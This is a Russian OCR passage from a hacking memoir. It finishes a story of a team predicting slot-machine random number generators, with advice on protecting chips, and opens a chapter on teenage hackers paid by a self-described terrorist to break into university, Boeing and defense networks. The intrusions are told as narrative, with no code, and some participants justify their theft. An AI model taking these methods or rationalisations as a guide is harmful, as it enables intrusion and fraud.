Случались напряженные моменты и у Марка. Однажды он сидел, ждал выпадения выигрышной комбинации и не заметил, как служащий подошел и встал у него за спиной. «Парень, ты удваиваешь ставку до пяти тысяч долларов — надо очень сильно верить в свою удачу, чтобы делать это», — сказал он с искренним удивлением. Пожилая женщина из-за соседнего автомата ответила ему сильно прокуренным дребезжащим голосом: «Нет... удача здесь ни при чем». Я почувствовал, как служащий напрягся, почуяв что-то подозрительное. «Он просто настоящий мужик», — проскрипела старая карга. Служащий хмыкнул и отошел от меня.

За три года команда полностью забросила свою законную работу и с успехом применяла свои умения и навыки на новом поприще борьбы с игральными автоматами. Они купили еще два, один из них был самой современной моделью, и продолжили модернизировать свое ПО.

Во время своих путешествий три члена команды старались посещать разные казино, чтобы не работать «коллективом», вспоминает Алекс. «Один или два раза такое все же случалось, и это было очень глупо». Они старались уведомить друг от друга о маршрутах своих передвижений, но иногда кто-то забывал это сделать. Играли они только в казино и никогда не пользовались автоматами в супермаркетах, поскольку «выигрыш там был слишком мал».

ПОПАЛИСЬ!

Апекс и Майк старались ввести в их команде строгую дисциплину, чтобы «уменьшить вероятность быть пойманными. Среди правил, которые нельзя было нарушать, были такие — никогда не выигрывать слишком много денег в одном месте, нигде не сидеть слишком долго, никогда не ходить в одно место много дней подряд».

Майк относился к дисциплине серьезнее всех, и считал, что двое его компаньонов недостаточно осторожны. Он сам всегда старался выигрывать не так много и быть больше похожим на типичных посетителей казино. Когда у него выпадала выигрышная комбинация, например два туза, а компьютер советовал ему сбросить одного или даже обоих тузов, потому что взамен им должна была прийти еще более выгодная комбинация — три валета, например, — он предпочитал следовать не советам компьютера, а простому здравому смыслу, чтобы не выглядеть странно. Во всех казино существовали системы «Небесное око», попросту говоря — камеры видеонаблюдения в разных местах под потолком всех помещений казино, которые могут поворачиваться и приближать о изображение в поисках мошенников, нечестных сотрудников ка- "§ зино, и других стремящихся поживиться легкими деньгами. Как g только любой из наблюдателей увидит, что игрок за автоматом I сбрасывает два туза, он поймет, что дело нечисто, поскольку ни * один нормальный человек так не поступит. Сбрасывать тузы мо- s жет лишь тот, кто каким-то образом осведомлен о том, что дальше будут еще лучшие карты. | Алекс не был столь предусмотрителен, а Марко — еще в меньшей § степени. «Марко всегда был нахалом», — считает Алекс. s «Марко очень умный парень, у него нет высшего образования, он само- | учка, тем не менее - это один из самых блестящих представителей Вое- § точной Европы. Яркий и энергичный. g Он знал о компьютерах практически все, но он вбил себе в голову, что в "§ W казино работают одни тупицы. Так можно было подумать, поскольку нам удавалось извлекать из казино немало денег. Но все равно, надо было быть очень осторожным.

Он был слишком смелым, мешало ему и то, что выглядел он как иностранный школьник. Он просто притягивал к себе подозрительные взгляды. С ним никогда не было ни жены, ни подружки, что обычно вселяет спокойствие в служащих казино.

Я думал, что, в конце концов, он научится не привлекать к себе внимания. Но время шло, мы становились все опытнее и переходили к более дорогим автоматам, которые давали нам большие выигрыши, а это еще больше повышало риск»...

Хотя Майк не соглашался, Алекс предлагал всем троим, подвергающимся реальной опасности, обсудить то, как далеко они могут заходить в этом риске. Он это формулировал так: «Риск повышается, но надо все время пытаться контролировать его верхнюю планку».

И, наконец, пришел день, когда сидевшего перед автоматом в казино Марко очень быстро окружили сотрудники службы безопасности и потащили в специальную комнату для серьезного разговора.

Вот как восстанавливает события Алекс:

«Ситуация была неприятной, поскольку все мы слышали множество историй о том, как такие мальчики выбивают любые признания. Это были ребята из разряда «какая к чертям полиция, мы сами с тобой разберемся!»

Марко был напуган, но у него сильный характер. На самом деле, я был даже рад, что первым из нас поймали его, поскольку он был лучше других подготовлен к такой ситуации. Он спокойнее всех нас мог отнестись к 24 происходящему, используя свой восточноевропейский опыт..

Он проявлял всю возможную лояльность к тем, кто его задержал, и не выдал никого из нас. Он не говорил ни слова о партнерах, или чем-то подобпз m ном. Он нервничал и был очень испуган, но остался тверд во время допго с;

роса и говорил, что работал в одиночку. Он говорил: «Ребята, если я арестован, а вы из полиции, то где обвинение?»

Это была правильная политика, поскольку они не были полицией, и не имели права задерживать его. Они продолжали его допрашивать, но они не имели права его задерживать».

Они забрали все его «оборудование», вспоминает Алекс, конфисковали компьютер и все деньги, которые нашли при нем — около семи тысяч долларов наличными. После часа интенсивного допроса (а может быть, он продолжался и дольше, — Марко был слишком взвинчен, чтобы следить за временем) они отпустили его.

Марко позвонил приятелям по пути домой. Его речь звучала, как у безумного. Он сказал: «Я хочу рассказать вам, ребята, что случилось. Меня прищучили».

Майк отправился прямо в их «штаб-квартиру». «Мы с Алексом сильно испугались, услышав, что случилось. Я начал разламывать наши машины и разбрасывать обломки по всему городу».

Алекс и Майк оба были очень недовольны тем, что случилось с Марко из-за того, что он неразумно рисковал. Он не разместил кнопку своего компьютера в ботинке, как это делали двое других членов команды, упрямо таская компьютер в кармане пиджака и управляя им рукой. Алекс говорил о Марко, что тот «считает сотрудников безопасности казино такими глупыми, что можно безнаказанно размахивать своим выигрышем перед их носом».

Алекс был уверен, что он понимает, как все произошло, несмотря на то, что он там не присутствовал. На самом деле никто из членов команды не знал, что Марко отправился играть в это казино, несмотря на их договор посвящать друг друга в свои планы. Вот что предполагал Алекс: «Они просто заметили, что он все время держит руку в кармане и выигрывает большие суммы». А Марко даже и в голову не приходило задуматься о том, как он выглядит со стороны заинтересованных наблюдателей, какими были служащие казино.

Для Алекса случившееся означало конец компании, хотя он не знал, как поступят другие. «В самом начале нашей деятельности мы договорились, что если кого-то из нас поймают, то мы все прекращаем. Мы твердо держались этого принципа, насколько я знаю». Через пару минут он добавил менее уверенно: «Во всяком случае, я его придерживался». Майк был с ним согласен, но никто из них ни разу не поговорил с Марко напрямую.

Казино не стало предпринимать никаких шагов даже после того, как один из ребят был пойман. «Причина в том, что они не хотят делать свои слабости достоянием общественности», — объясняет Алекс. — «Реакция казино в таких случаях обычна: «Убирайтесь из го- о рода до захода солнца». Если вы соглашаетесь никогда не заходить "g больше в казино, они вас отпускают». ^ I Ф А ПОСЛЕДСТВИЯ | Через шесть месяцев Марко получил письмо, где было сказано, что обвинения против него выдвигаться не будут. ^ После всего, что произошло, ребята остались друзьями, но уже не ь такими близкими, как в начале всей затеи. Алекс подсчитал, что он заработал около 300 тысяч долларов, часть из которых была отдана | Ларри по предварительной договоренности. Изначально трое играв- § ших в казино договаривались, что будут делить всю добычу поровну, ь но, по мнению Алекса, Майк и Марко заработали от 400 тысяч до полумиллиона долларов. Майк считает, что заработал не больше 300 тысяч долларов, но признает, что Алекс, вероятно, заработал меньше, чем он.

Они делали свое дело около трех лет. Они могли зарабатывать и зарабатывать еще, но Алекс говорит, что был рад, когда все кончилось: «Честно говоря, я наконец-то смог вздохнуть свободно. Удовольствие уже давно испарилось. Это стало настоящей работой, тяжелой и рискованной». Майк тоже был совсем не огорчен, что все кончилось, по его словам «это занятие стало изнурительным».

Сначала оба не хотели ничего рассказывать об этой истории, но затем делали это с удовольствием. И это достаточно естественно — за десять лет после произошедших событий никто из нашей четверки не сказал ни слова о них никому, кроме своих жен и подруг, которые составляли часть истории. Мы заключили с ними договор о полной анонимности, поэтому этот рассказ стал для них своеобразным освобождением. Они поистине наслаждались, вспоминая детали и подробности, и Майк признает, что «это была одна из самых восхитительных вещей в моей жизни».

Скорее всего, Алекс выражает общее мнение, когда говорит об их отношении к произошедшему:

«Я не считаю деньги, которые мы заработали, нечистыми. Это капля в обороте этой индустрии. Говорю от души: мы никогда не чувствовали себя жуликами, поскольку сражались с казино.

Это легко объяснить. Мы отбирали деньги у казино, которые крали их у старушек, предлагая им игры, в которые нельзя выиграть. Лас-Вегас дает тебе почувствовать, как люди вместе с четвертаками бросают в щели игровых автоматов кусочки своей жизни. Поэтому мы забирали деньги у «большого брата», а не из карманов обычных людей.

Когда они приглашают вас поиграть, то говорят: «Если вы выберете нужные карты, то вы выиграете». Мы выбрали правильные карты. Они просто не ожидали, что кто-то сможет сделать это».

та го Алекс говорит, что ничего подобного больше делать не будет. Но по " — достаточно неожиданной причине: «Сейчас у меня есть другие возможности заработать деньги. Если я окажусь в том же финансовом положении, что был тогда, я, возможно, опять попробую этим заняться». Он считает все, что они делали, вполне приемлемым.

В этой игре кошки с мышкой кошка постоянно изучает новые мышкины фокусы и предпринимает против них соответствующие меры. Игровые автоматы сегодня используют гораздо более качественное ПО; наши ребята совсем не уверены, что им удастся взломать его, если они попытаются совершить еще одну попытку.

И, тем не менее, для любой техники невозможно обеспечить полную безопасность. Алекс так формулирует это: «Как только кто-то скажет: «Ни у кого не возникнет желания ввязываться в проблемы, чтобы сделать это», как появятся несколько финских ребятишек, которые как раз и захотят ввязаться в эти проблемы».

И не только финских, но и американских.

АНАЛИЗ В девяностые годы прошлого века сотрудники казино и конструкторы игровых автоматов еще не осознавали некоторых вещей, которые позднее стали очевидными. Генераторы псевдослучайных чисел на самом деле не генерируют случайные числа. На самом деле они являются наборами чисел, расположенных в произвольном порядке.

Даже очень длинный список — от единицы до двух в тридцать второй степени — это всего миллиард чисел. В начале работы программа случайным образом выбирает место в этом списке, но потом, пока она не начнет новый цикл игры, она использует определенную последовательность чисел — одно за другим.

Разбираясь в том, как работает программа игрального автомата, ребята узнали этот перечень. Находясь в любом пункте этого перечня, они знали, какие номера будут выпадать дальше и при помощи некоторых дополнительных сведений о работе программы в автомате они могли определить, через какое время автомат выбросит им королевский флэш.

КОНТРМЕРЫ Производители любого оборудования, в состав которого входят чипы ROM и программы, должны специально заботиться о проблемах безопасности. А для каждой компании, которая использует устройства на основе компьютеров и программ — что сегодня означает практически любую компанию, вплоть до лавочки с одним продавцом — опасно думать, что ребята, которые создавали эти системы, о подумали обо всех возможных лазейках. Программисты ПО для "§ японских игровых автоматов совершили ошибку, не подумав о том, = j какие атаки могут быть совершены на них. Они никак не защитили I свои программы от проникновения в них хакеров. Они должны были * предусмотреть такую ситуацию, когда кто-то получит доступ к маши- s не, извлечет из нее чип, прочтет программу, зашитую в него, и вое- ° становит ее текст, который расскажет ему все подробности о работе автомата. Даже если они и думали о такой возможности, то сочли, что § точного знания того, как работает автомат, будет недостаточно, пос- g кольку не так-то просто разобраться в работе генератора случайных J чисел. Это справедливо сегодня, но в те годы это было не так. § Итак, ваша компания выводит на рынок продукты, которые со- g держат компьютерные чипы; что необходимо сделать, чтобы обеспечить адекватную защиту от конкурентов, которые, несомненно, хотят заглянуть в ваши программы, от зарубежных компаний, которые захотят сделать дешевые копии ваших товаров, от хакеров, которые хотят обмануть вас?

Первый шаг: постарайтесь затруднить доступ к ПО.

Вот как это можно сделать:

• приобретайте чипы, защищенные от возможных атак; некоторые компании изготавливают чипы, специально сконструированные для работы в ситуациях, где возможность внешних атак велика;

• используйте практику «встроенного чипа» — конструкцию, в которой чип встроен в материнскую плату таким образом, что его оттуда нельзя извлечь;

• прикрепляйте чип к плате прочным эпоксидным клеем так, чтобы при попытке извлечь его оттуда он ломался; добавление алюминиевого порошка к эпоксидке улучшает крепление, потому что при попытке вынуть чип, разогревая эпоксидку, алюминий разрушает чип;

• используйте технологию BGA (Ball Grid Array); она основана на том, что «ножки» чипа не выходят наружу с боков чипа, а упрятаны под него, что усложняет, а порой и делает невозможным снятие сигналов с ножек чипа, когда он вставлен в материнскую плату.

Еще одна возможная контрмера—уничтожение информации о производителе чипа, так, чтобы атакующий не мог установить тип чипа.

Достаточно распространена и практика контрольных сумм в программах. Если программа меняется, то меняется и ее контрольная сумма и программа в устройстве перестает работать. Однако, опытный хакер, знакомый с этой мерой защиты, может отыскать место в программе, где происходит суммирование и отключить его.

Методы физической защиты чипа являются гораздо более надежным средством.

ЗАКЛЮЧЕНИЕ Если ваше ПО представляет для вас ценность, проконсультируйтесь с экспертами в области безопасности, чтобы понять, какую технику используют сегодня хакеры. Снабжайте ваших программистов и разработчиков самой последней информацией в этой области.

И будьте абсолютно уверены в том, что они предпринимают все необходимые меры для обеспечения адекватного уровня безопасности.

главе Когда террорист звонит

–  –  –

"У^^адцатилетний хакер Comrade (для непосвященных, если ^ш щ таковые вдруг читают эту книгу, — Comrade, neOh, и др., — J ^ " ^ ^ это так называемые «никнеймы», то есть псевдонимы, используемые в Сети — прим.ред), теперь проводит свои дни в компании брата, в принадлежащем им доме, в красивом районе Майами.

С ними живет и их отец, но это лишь потому, что брат еще несовершеннолетний, и Служба охраны детства настаивает на том, чтобы в доме жил взрослый человек, пока младшему ребенку не исполнится 18 лет. Братьев это не особенно волнует — у папаши есть свое жилье, куда он и отправится, когда придет время.

Мама Comrade скончалась два года назад, оставив дом сыновьям, поскольку с отцом мальчиков они были в разводе. Она оставила им и немного денег. Его брат посещал колледж, a Comrade «просто болтался». Членам его семьи это не нравилось, но по его словам, «его это не колыхало». Когда вы уже побывали в тюрьме в очень юном возрасте, став самым юным хакером, посаженным туда, этот печальный опыт смещает вашу шкалу ценностей.

Хакерство не знает границ, поэтому нет никакой проблемы в том, что друг Comrade, хакер neOh, находится на расстоянии трех тысяч миль от него. Их сдружило хакерство, хакерство привело их на тот скользкий путь, идя по которому, взламывая важные компьютерные системы, желая или не желая этого, они, вполне возможно, сыграли на руку международному терроризму. В наши дни это особенно тяжело осознавать.

neOh на год старше Comrade, и, по его словам, «пользовался компьютером с того момента, как смог дотянуться до клавиатуры».

У его отца был компьютерный магазин, и он всегда брал сына на встречи с клиентами; мальчик сидел на коленях у отца во время переговоров. В возрасте одиннадцати лет он написал программу управления базой данных для отцовского бизнеса.

Однажды в руки neOh попалась книга "Takedown" (Hyperion Press, 1996), которая представляет собой крайне некорректное изложение моих собственных хакерских попыток в течение трех лет и погони ФБР за мной. neOh был совершенно захвачен этой книгой.

«Ты меня просто вдохновил. Ты стал моим долбаным наставником.

30 Я прочел все, что только смог достать о твоих делах. Я хотел стать знаменитостью, как и ты».

Это и привело его на путь хакерства. Он украсил свою комнату компьютерами и сетевыми узлами, водрузил шестифутовый пиратский флаг, и решил отправиться по моим стопам.

neOh начал постигать мастерство хакера. Сначала пришло умение, потом — осторожность. Используя хакерскую терминологию, он поясняет: «Вначале, по хакерскому малолетству (рассказчик употребляет забавное слэнговое выражение «skript kiddie» — что буквально означает «скриптомалышки» — прим. ред.), я залезал на другие Интернет сайты и размещал на них мой адрес электронной почты».

Он тусовался на сайтах IRC (Internet Relay Chat) — специальных местах в Интернете, где люди с общими интересами могут встречаться и обмениваться информацией в режиме реального времени с другими такими же любителями поговорить — рыбаками, собирателями антикварных аэропланов, домашними пивоварами или еще тысячей групп любителей того или иного занятия, включая хакерство. Вы можете напечатать любую мысль на IRC-сайте и все, находящиеся на этом сайте, могут прочесть ее и ответить. Мало кто из участников таких переговоров знает, что все они записываются и сохраняются в памяти ПК. В подобных записях уже не меньше слов, чем в Библиотеке Конгресса США, и, несмотря на отсутствие в них глубокого смысла, через годы и даже десятилетия они могут быть прочитаны.

Comrade часто тусовался на некоторых таких сайтах и поддерживал удаленную дружбу с neOh. Хакеры часто образуют подобные альянсы для обмена информацией и организации групповых атак.

neOh, Comrade и еще несколько их приятелей решили создать группу под названием «Эльфы Киблера». Три организатора позволяли рядовым членам группы участвовать в переговорах, но не посвящали их в свои планы относительно будущих атак. «Мы залезали на правительственные сайты исключительно для удовольствия», — говорит Comrade. По его оценке, они взломали таким образом «несколько сотен» правительственных сайтов.

IRC-сайты становятся местом сбора различных хакеров. Один из них, под названием Efnet, как говорил Comrade, был «не то, чтобы компьютерный андерграунд — это просто большая группа серверов».

Но в Efnet были каналы куда менее известные, такие места, куда самостоятельно ни за что не попасть — нужно, чтобы кто-то знающий и доверяющий вам показал вам дорогу. Вот это, по словам Comrade, и был андерграунд.

ТЕРРОРИСТ ХАЛИД ЗАКИДЫВАЕТ НАЖИВКУ

В 1998 году на этих «каналах андерграунда» Comrade стал встречать человека, который тусовался под именем RahulB. (Позднее он стал использовать имя Rama 3456). «Он был из разряда тех, 7^ кто подбивает хакеров взламывать правительственные и военные 3 компьютеры — сайты с расширениями.gov и.mil», — вспоминал Comrade. — «Ходили слухи, что он сотрудничает с Бен Ладеном. ?

Это было до 11 сентября 2001 г., поэтому это имя еще мало кто знал». 3 Достаточно случайно пути Comrade пересеклись еще с одним за- § гадочным человеком, которые представлялся как Халид Ибрагим. s «Я разговаривал с ним несколько раз (на сайте IRC) и один раз по телефону». У мужчины был иностранный акцент, и было понятно, «что это соединение с очень далекой страной».

Общался с этим человеком и neOh, но с ним Халид был более прямым и конкретным.

«Где-то в 1999 году я связался по электронной почте с человеком, который назвался боевиком из Пакистана по имени Халид Ибрагим. Он сказал, что работает на пакистанскую повстанческую армию».

А действительно ли до 9 сентября для завоевания сердец наивных молодых хакеров надо было представляться террористом? На первый взгляд такое предположение выглядит совершенно абсурдным. Впоследствии этот человек утверждал, что ходил в обычную американскую школу, немного интересовался хакерством и просто был в их компании. На самом деле, он имел довольно верное представление об образе мыслей и психологии хакеров. Каждый хакер в некоторой степени — отщепенец, смутьян, живущий по отличным от общепринятых стандартам и наслаждающийся борьбой с системой. Если вы хотите привлечь внимание хакеров к себе, вам стоит сказать, что вы такой же бунтарь, нарушающий правила, и эта позиция аутсайдера будет совсем не глупой. Вполне возможно, что она сделает вашу историю более убедительной, а ваших собеседников менее подозрительными и сомневающимися.

И, наконец, немаловажную роль играют деньги. Халид предложил neOh тысячу долларов за проникновение в компьютерную сеть китайского университета — место, которое neOh называет MIT в Китае — и копирование для него базы данных студентов. Вероятно, это была проверка на профессиональную пригодность neOh — не только его хакерских талантов, но и изобретательности: как удастся ему проникнуть в компьютерную систему, если он не понимает языка этой страны? Как применить таланты социальной инженерии там, где ты не знаешь языка?

Как оказалось, для neOh языковая проблема даже не возникла. Он начал тусоваться на сайтах IRC, где часто бывали члены группы 32 gLobaLheLL, где он нашел студента-компьютерщика из нужного ему университета. Он вступил с ним в контакт и попросил достать г м несколько имен и паролей пользователей. Эта информация была предоставлена ему очень быстро — хакеры не задают друг другу вопL- роса «зачем». neOh быстро понял, что систему компьютерной безопасности в университете можно описать словами от «ужасная» до «слабая», что было странно для университета с большим числом технологических и инженерных факультетов — они обязаны были бы знать это дело лучше. Большинство студентов выбирали в качестве своих паролей имена, аналогичные их именам пользователей — то же самое слово или фразу.

Полученный им список студентов позволил neOh заняться путешествиями по недрам Интернета, которые хакеры называют специальным термином "sniffing" (можно перевести, как вынюхивание, отсюда sniffer — «нюхач» — прим. переводчика). В конце концов, он отыскал студента, которого мы назовем Чанг, посещавшего сайты в США, откуда он перекачивал информацию. Среди этих сайтов был такой, откуда можно было брать компьютерные программы. Чтобы вступить в контакт с Чангом, ему пришлось узнать несколько слэнговых словечек, характерных именно для этого университета. Это оказалось сделать легче, чем кажется. Затем он вступил в контакт с Чангом, используя такой адрес и пароль, чтобы казалось, что он находится в компьютерной лаборатории университета.

«Я из корпуса 213», — послал он сообщение Чангу, и спросил у него имена и адреса электронной почты студентов, что выглядело совершенно естественно, поскольку студенты всегда хотят расширить круг своего общения. Поскольку, как уже было сказано, пароли большинства студентов были предельно просты, никакого труда не составило просмотреть их файлы.

Очень скоро он смог послать Халиду базу данных с сотней студенческих имен. «Я ему передал это, а он сказал: «я получил все, что хотел». Халид был удовлетворен; естественно, ему не нужны были эти имена, он просто хотел убедиться в том, что neOh может получить доступ к информации, даже находясь на больпюм удалении от ее источника. «Именно тогда начались наши взаимоотношения», — подытоживает neOh. «Я мог делать работу, он понял, что я могу делать работу и начал давать мне другие задания».

Халид сказал neOh почаще заглядывать в почтовый ящик, где должен был появиться конверт с тысячью долларов, и начал звонить ему по сотовому телефону примерно раз в неделю, «обычно, когда он был за рулем». Следующим заданием стало проникновение в компьютерную систему Атомного исследовательского центра BhaBha в Индии. Местом для проникновения была выбрана рабочая станция компании Sun Microsystems, хорошо знакомая каждому хакеру. neOh достаточно легко проник в нее, но быстро понял, что в ней не содержится ничего интересного, машина не была присоединена ни к ка- т\ кой сети. Казалось, что Халид нисколько не был разочарован этим.

Деньги за китайский университет все не приходили. Когда neOh спросил об этом, Халид был удивлен. «Tbi еще не получил их? Я послал тебе наличные в поздравительном письме!» — настаивал он.

Постоянное повторение: «твои деньги в письме» звучало фальшиво, и все же neOh решил продолжить выполнение задания. Почему? Вот § как он вспоминает об этом сегодня. 5 «Я решил продолжить, поскольку я упрямый. Мне очень нравилось думать, что мне заплатят хорошие деньги за подобную работу. Я думал, может быть, письмо действительно затерялось, и он заплатит мне на этот раз.

Я не знал, почему я продолжал работать с ним. Природная склонность?

Жажда наживы? Стремление к власти? Можно перечислить целый ряд причин».

Давая задания neOh, Халид искал на IRC-сайтах и других желающих поучаствовать в его работе. Comrade был готов к этому, хотя не хотел получать деньги за свою работу.

«Я понимал, что Халид платит людям, но я никогда не хотел продавать информацию за деньги. Я всегда думал, что пока я просто развлекаюсь, но если я начну получать за это деньги, то стану настоящим

3. Заказ МК-5669.

преступником. Я был готов пообщаться с ним на IRC, дать ему несколько адресов, но - не больше».

Журналист Нэйл Маккей беседовал с другой «рыбкой», которую Халид поймал в свои сети, с юношей из Калифорнии по кличке Chameleon (который сейчас основал очень успешную компанию, занимающуюся безопасностью). Маккей изложил свою историю на сайте wired.com1 с некоторыми дополнениями, которые сделали neOh и Comrade. «Я был на сайте IRC, когда этот парень сказал, что ему нужны программы DEM, у меня их не было, и я тогда еще не знал этого парня», — вспоминает хакер. Но это желание Халида было уже достаточно серьезным: "DEM" — это название информационной системы Министерства обороны — Defense Information Systems Network Equipment Manager. Эта программа была захвачена группой хакеров Masters of Downloading («Мастера загрузки») и в среде хакеров ходили слухи, что ее можно получить, если обратиться к нужным людям.

Никто не знал — добрался Халид до нее или нет, во всяком случае, никто не упоминал об этом. На самом деле никто не был уверен, что эта программа имеет для Халида какую-то ценность, но он наверняка думал, что имеет. До этих пор Халид занимался безобидными играми с китайскими университетами и подобными вещами.

«Он пытался встроиться в те дела, которыми занимались ребята в этой группе», — вспоминает neOh. «Пока этого не случилось, Халид полтора года тусовался с хакерами — не случайным образом, а постоянно. Он просто всегда был где-то неподалеку, и было ясно, что это его интересует». Под словом «это» neOh понимает проникновение на военные сайты или в коммерческие компании, занимающиеся военными проектами.

Халид попросил neOh проникнуть в компанию Lockheed Martin и получить схемы определенных систем самолетов, которые были сделаны для компании Boeing. neOh проник на определенный уровень в систему компании Lockheed — «на три ступени во внутреннюю сеть», но глубже второго уровня безопасности ему проникнуть не удавалось (этот уровень сотрудники систем безопасности называют «DMZ» — что означает демилитаризованная зона или «земля без людей»). Этого было явно недостаточно, чтобы проникнуть за защитный экран, который охранял самую ценную информацию компании, поэтому ему не удалось раздобыть заказанные сведения.

«Халид был раздражен. Он сказал: «Ты больше на меня не работаешь.

Ты ни на что не способен». Но потом он обвинил меня в нечестности. Он «Do "terrorist troll the Net?» статья Nial McKay, wired.com. 11 /4/1998.

сказал, что я придерживаю информацию для себя. Потом он сказал: «Забудь про Lockheed Martin. Проникай прямо в Boeing».

neOh обнаружил, что «Boeing совсем не так уж хорошо защищен, если вы хотите в него проникнуть». По его словам, ему удалось проникнуть в систему компании Boeing, используя достаточно известную лазейку со стороны Интернета. Затем он установил там «нюхач»

и получил возможность просматривать все пакеты данных, исходящих из компьютера — своеобразный «жучок» для прослушивания.

Он мог перехватывать пароли и незашифрованные электронные письма. Из них ему удалось извлечь достаточно информации для того, чтобы проникнуть во внутреннюю сеть компании.

«Я нашел шесть или семь схем самолета Boeing 747 - просто в обычных письмах. Незашифрованные приложения - разве это не прекрасно?!

(NeOh смеется).

Халид просто пришел в экстаз. Он сказал, что заплатит мне четыре тысячи долларов. Но их я так и не увидел - сюрприз, сюрприз!»

–  –  –

тежеи. После этого информация перестает быть секретной; ее может н получить каждый, кто стремится это сделать. «Я видел CD со всеми тз чертежами Boeing-747 на аукционе eBay недавно», — говорит Дон. "§ Вероятно, Халид просто не знал этого. Впрочем, никто не знал этого ш еще два года, пока вся страна не обнаружила, что у террористов были важные причины получить в свое распоряжение чертежи транспортных самолетов, летающих на авиалиниях США.

ЦЕЛЬ НА ВЕЧЕР: SIPRNet С Comrade Халид не утруждал себя проверками. Хакер говорит, что с самого начала Халида «интересовали только военные и SIPRNet».

«Он всегда был не слишком конкретен в своих запросах - просто доступ к правительственным и военным сайтам. За исключением SIPRNet. Он действительно хотел получить информацию о SIPRNet».

И это была достойная мишень. SIPRNet — это была часть DISN, Defense Information System Network (Сеть оборонной информации), которая содержала важные сведения. SIPRNet — сокращение от Secret Internet Protocol Router Network (секретный Интернет-протокол маршрутизатора сети) — это ядро управления для американской армии.

neOh уже отказался от предложения Халида проникнуть в

SIPRNet:

«Он предложил две тысячи долларов. Я отказался. Если бы я проник в SIPRNet, федеральная полиция оказалась бы у моих дверей. Две тысячи долларов - недостаточная цена за пулю в голове».

К тому моменту Халид уже переговорил с Comrade об этой работе, цена ее быстро возрастала. «Он сказал, что готов заплатить 10 000 долларов за доступ» — вспоминает Comrade, и это было более достойное предложение, чем сделанное neOh, хотя Comrade настаивает, что им двигало только чувство спортивного азарта, но уж никак не деньги.

«Я подошел совсем близко к SIPRNet. Я проник в компьютерную систему DISA (Defense Information Security Agency - Агентство по информационной безопасности министерства обороны). Это был превосходный компьютер с четырьмя процессорами, около двух тысяч пользователей работало с ним, на нем было около пяти тысяч Unix-хостов и половина из них была 36 привилегированными; чтобы попасть в них, вы должны были зайти именно с этого компьютера, извне в них попасть было просто невозможно».

Осознав это, Comrade понял, что целью Халида является нечто действительно серьезное. Главной задачей DISA была поддержка управления военными действиями — здесь ее функции перекрывались с SIPRNET. Но активность хакера была быстро пресечена.

«Прикольно было иметь все эти коды, но я не успел поиграть с ними.

Уже на четвертый день я попался».

ТРЕВОЖНЫЕ ДНИ

В канун Рождества в 1999 году neOh и Comrade испытали серьезную встряску. Самолет индийских авиалиний IC-814 во время рейса из Катманду в Нью-Дели со 178 пассажирами и 11 членами экипажа на борту был захвачен террористами. Как сообщали выпуски новостей, это были пакистанские террористы, связанные с движением Талибан, к которому принадлежал и Халид, по его словам.

По приказу террористов, Airbus A300 проследовал по сложному маршруту на средний Восток и обратно, приземлившись ненадолго в Индии, Пакистане и Арабских Эмиратах, где было оставлено тело убитого пассажира, молодого человека, возвращавшегося домой со своей женой после медового месяца. Он был приговорен к смерти лишь за то, что отказался надеть на глаза повязку.

Потом самолет приземлился в Кандагаре (Афганистан), что еще яснее обозначило связи террористов с движением Талибан. Оставшиеся пассажиры и экипаж удерживались на борту восемь ужасных дней и были освобождены в обмен на освобождение трех военных преступников. Один из освобожденных, Шейх Умер, потом будет играть заметную роль в финансировании Мохаммеда Ата, организатора атак 11 сентября на башни торгового центра в Нью-Йорке.

После угона самолета Халид сообщил neOh, что его группа и он сам берут на себя ответственность за эту акцию.

«Это напугало меня до смерти. Он был совсем плохой парень. Я чувствовал, что мне пора спасать свою задницу».

–  –  –

Та же статья McKay.

Буквально за день до этого, мой приятель сказал мне: «Старина, нас скоро схватят». Видно было, что он уже свыкся с этой мыслью. Я согласился с ним: «Да, они наверняка нас выследили». Поэтому я удалил все файлы с диска в компьютере».

Однако Comrade, как обычно, все делал небрежно, и забыл удалить файлы со старых дисков, которых было немало на его столе.

«Они допрашивали меня, я соглашался с их обвинениями. Я сказал:

«Я очень сожалею обо всем, что я сделал. Как нам все это уладить?

Я обещаю больше так не поступать». Казалось, что они были довольны:

«Все хорошо, мы не считаем вас преступником, никогда больше не делайте этого. Если вы еще раз так поступите, то окажетесь в наручниках».

Они забрали с собой все мои компьютеры, периферийные устройства, запасные жесткие диски и ушли».

Через некоторое время они попросили у Comrade пароли к его жестким дискам. Он не дал пароли, тогда они сказали, что без проблем найдут их самостоятельно. Comrade был спокоен: он использовал схему PGP-шифрования и его пароль был «длиной в сто символов». При этом он говорил, что его не так сложно запомнить — это 38 были три его любимые цитаты, написанные одна за другой.

Comrade не слышал о них больше шести месяцев. Затем однажды он узнал, что правительство собирается выдвинуть против него обпа винения. Когда он оказался в суде, то был ошарашен тем, в чем его о с;

обвиняют — это был вывод компьютеров НАСА из строя на три недели и перехват тысяч электронных писем министерства обороны.

(Между тем «вредом», который фигурирует в обвинении и реальным вредом, нанесенным обвиняемым, есть большая разница.

Comrade перегружал себе программы из Центра управления полетами НАСА имени Маршалла в Алабаме, который занимался исключительно контролем температуры и влажности на международной космической станции; правительство же инкриминировало ему вывод из строя на три недели всей компьютерной системы НАСА.

Утверждение об атаке Министерства обороны было более осмысленным:

Comrade проник в компьютерную систему Агентства по снижению угроз и установил там специальную программу, которая у хакеров называется «черный ход», это позволяло ему проникать туда в любой момент).

По мнению правительства, случай заслуживал самого серьезного рассмотрения, как предупреждение для других несовершеннолетних хакеров. О нем планировалось рассказать в прессе, как о случае наказания самого юного хакера за серьезные преступления.

Генеральный прокурор Джанет Рено даже сделала специальное заявление:

«Этот случай станет первым, когда такой юный хакер будет заключен в тюрьму, мы хотим продемонстрировать, что считаем проникновение в компьютерные системы серьезным преступлением и вместе с нашими коллегами будем активно этому противодействовать».

Судья приговорил Comrade к шести месяцам заключения в тюрьме и шести месяцам последующего пребывания под наблюдением инспектора (приговор должен быть вступить в силу после окончания учебного года). Мать Comrade в то время была еще жива; она наняла нового адвоката, написала кучу прошений, напирая на то, что ее сын «стал другим человеком», и, как это не удивительно, она добилась пересмотра приговора до домашнего ареста и четырех лет нахождения под наблюдением.

Однако, в жизни мы не всегда используем шанс исправиться.

«Я посидел под домашним арестом, потом перешел под наблюдение инспектора. Я начал бегать по вечеринкам и они отправили меня на реабилитацию». После реабилитации Comrade получил работу в Интернет-компании и даже организовал свой небольшой Интернетбизнес. Но при этом ему далеко не всегда удавалось встретиться со своим инспектором, поэтому его все-таки отправили в тюрьму. Тогда ему было всего шестнадцать лет, а приговор он получил в возрасте пятнадцати лет.

